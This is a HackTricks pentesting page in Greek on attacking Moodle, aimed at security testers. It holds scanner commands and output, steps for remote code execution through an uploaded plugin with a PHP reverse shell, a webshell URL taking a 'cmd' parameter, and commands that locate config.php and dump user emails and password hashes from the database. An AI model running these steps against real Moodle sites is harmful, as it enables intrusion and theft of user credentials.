8.1 KiB
Moodle
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team του HackTricks AWS)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια στο GitHub.
Συμβουλή για αμοιβή ευρημάτων: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα αμοιβής ευρημάτων δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος μας στο https://go.intigriti.com/hacktricks σήμερα και αρχίστε να κερδίζετε αμοιβές έως και $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Αυτόματες Σάρωσεις
droopescan
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php
[+] No themes found.
[+] Possible version(s):
3.10.0-beta
[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/
[+] Scan finished (0:00:05.643539 elapsed)
moodlescan
moodlescan
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/
Version 0.7 - Dic/2020
.............................................................................................................
By Victor Herrera - supported by www.incode.cl
.............................................................................................................
Getting server information http://moodle.schooled.htb/moodle/ ...
server : Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by : PHP/7.4.15
x-frame-options : sameorigin
last-modified : Wed, 07 Apr 2021 21:33:41 GMT
Getting moodle version...
Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta
Searching vulnerabilities...
Vulnerabilities found: 0
Scan completed.
CMSMap
CMSMap
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
CVEs
Ανακάλυψα ότι τα αυτόματα εργαλεία είναι αρκετά άχρηστα στον εντοπισμό ευπαθειών που επηρεάζουν την έκδοση moodle. Μπορείτε να τις ελέγξετε στο https://snyk.io/vuln/composer:moodle%2Fmoodle
RCE
Χρειάζεστε ρόλο manager και μπορείτε να εγκαταστήσετε πρόσθετα μέσα στην καρτέλα "Διαχείριση Ιστότοπου"**:**
Αν είστε manager, ενδέχεται να χρειαστεί να ενεργοποιήσετε αυτήν την επιλογή. Μπορείτε να δείτε πώς στο PoC εκμετάλλευσης προνομίων του moodle: https://github.com/HoangKien1020/CVE-2020-14321.
Στη συνέχεια, μπορείτε να εγκαταστήσετε το ακόλουθο πρόσθετο που περιέχει τον κλασικό php rev shell (πριν το ανεβάσετε, πρέπει να το αποσυμπιέσετε, να αλλάξετε τη διεύθυνση IP και τη θύρα του revshell και να το συμπιέσετε ξανά)
{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
Ή μπορείτε να χρησιμοποιήσετε το πρόσθετο από https://github.com/HoangKien1020/Moodle_RCE για να λάβετε ένα κανονικό PHP shell με την παράμετρο "cmd".
Για να αποκτήσετε πρόσβαση και να εκκινήσετε το κακόβουλο πρόσθετο, πρέπει να αποκτήσετε πρόσβαση στο:
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
POST
Εύρεση διαπιστευτηρίων βάσης δεδομένων
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
Απορρόφηση διαπιστευτήριων από βάση δεδομένων
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
Συμβουλή για bug bounty: Εγγραφείτε στο Intigriti, μια προηγμένη πλατφόρμα bug bounty δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα και αρχίστε να κερδίζετε αμοιβές έως και $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε Την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.